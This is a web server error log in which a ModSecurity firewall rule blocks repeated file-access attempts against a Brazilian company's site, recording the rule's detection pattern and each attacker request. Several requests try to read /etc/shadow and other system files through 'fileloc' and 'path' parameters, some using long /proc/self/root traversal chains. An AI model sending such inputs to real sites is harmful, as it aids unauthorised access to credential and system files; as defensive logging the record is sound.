[Wed Mar 18 04:23:27.146354 2026] [:error] [pid 29882:tid 140411590858496] [client 74.7.241.31:35014] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpS70zinOy1jxa1j4fWwgAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 04:23:32.796045 2026] [:error] [pid 17887:tid 140411582465792] [client 216.73.216.191:51788] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpS9AkwaGbbGflqUZDWcAAAANM"]
[Wed Mar 18 04:23:33.519206 2026] [:error] [pid 31803:tid 140411641214720] [client 216.73.216.191:51832] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpS9eyqAr6etmhZHNp9kAAAAEw"]
[Wed Mar 18 04:23:34.719659 2026] [:error] [pid 15826:tid 140411741927168] [client 216.73.216.191:51904] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rwtab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpS9uoXxyEfFpUF8f8xBgAAAUA"]
[Wed Mar 18 04:23:35.638999 2026] [:error] [pid 17653:tid 140411649607424] [client 216.73.216.191:51966] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/.updated"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpS98df6f5d65gmYZSVDAAAAss"]
[Wed Mar 18 04:23:36.343906 2026] [:error] [pid 26799:tid 140411658000128] [client 216.73.216.191:52010] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/environment"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpS-Na6ubjKNq_cu4ZatgAAA0o"]
[Wed Mar 18 04:23:36.536570 2026] [:error] [pid 31803:tid 140411708356352] [client 216.73.216.191:52028] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mailcap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpS-OyqAr6etmhZHNp9lwAAAEQ"]
[Wed Mar 18 04:23:37.778404 2026] [:error] [pid 26799:tid 140411641214720] [client 216.73.216.191:52112] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/redhat-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpS-da6ubjKNq_cu4ZaugAAA0w"]
[Wed Mar 18 04:23:40.189229 2026] [:error] [pid 17653:tid 140411725141760] [client 216.73.216.191:52280] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpS_Mdf6f5d65gmYZSVFAAAAsI"]
[Wed Mar 18 04:23:48.999507 2026] [mime_magic:error] [pid 17887:tid 140411699963648] (70014)End of file found: [client 216.73.216.191:40721] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 04:23:54.594839 2026] [:error] [pid 31803:tid 140411666392832] [client 216.73.216.191:52906] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudo-ldap.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTCuyqAr6etmhZHNp9qAAAAEk"]
[Wed Mar 18 04:23:56.379509 2026] [:error] [pid 31803:tid 140411607643904] [client 216.73.216.191:53020] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/profile"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTDOyqAr6etmhZHNp9qQAAAFA"]
[Wed Mar 18 04:23:58.558973 2026] [:error] [pid 30077:tid 140411733534464] [client 216.73.216.191:53156] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/shadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTDvu8EFLIOrSqIpvKmAAAAkE"]
[Wed Mar 18 04:24:17.625003 2026] [:error] [pid 11816:tid 140411741927168] [client 74.7.241.31:41336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTIew_le52K8_3pV2kkwAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:24:21.060755 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.241.31:35146] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTJcdf6f5d65gmYZSVPQAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:24:38.600606 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:35152] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTNta6ubjKNq_cu4Za9QAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:24:44.533827 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.241.31:51986] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTPAkwaGbbGflqUZDWtwAAAMA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:24:49.032194 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.241.31:51994] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTQda6ubjKNq_cu4Za-wAAA0U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 04:24:53.658046 2026] [:error] [pid 26799:tid 140411632822016] [client 74.7.241.31:35020] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTRda6ubjKNq_cu4ZbAAAAA00"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:24:54.367115 2026] [:error] [pid 15051:tid 140411708356352] [client 216.73.216.191:54146] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/anacrontab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTRimAPhZkrhU8w4kxxwAAAIQ"]
[Wed Mar 18 04:24:56.543158 2026] [:error] [pid 26799:tid 140411725141760] [client 216.73.216.191:54284] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/statetab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTR9a6ubjKNq_cu4ZbAgAAA0I"]
[Wed Mar 18 04:24:59.982277 2026] [:error] [pid 29882:tid 140411716749056] [client 216.73.216.191:54492] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTS0zinOy1jxa1j4fXGAAAAQM"]
[Wed Mar 18 04:25:01.392790 2026] [:error] [pid 17653:tid 140411741927168] [client 216.73.216.191:54566] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/pool.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTTcdf6f5d65gmYZSVagAAAsA"]
[Wed Mar 18 04:25:01.511333 2026] [:error] [pid 29882:tid 140411699963648] [client 216.73.216.191:54574] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/odbcinst.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTTUzinOy1jxa1j4fXIwAAAQU"]
[Wed Mar 18 04:25:04.352252 2026] [:error] [pid 29882:tid 140411683178240] [client 216.73.216.191:54534] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libuser.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTUEzinOy1jxa1j4fXKAAAAQc"]
[Wed Mar 18 04:25:04.693188 2026] [:error] [pid 29882:tid 140411540502272] [client 216.73.216.191:54642] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTUEzinOy1jxa1j4fXKQAAARg"]
[Wed Mar 18 04:25:08.587013 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.241.31:35034] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpTVOw_le52K8_3pV2krQAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
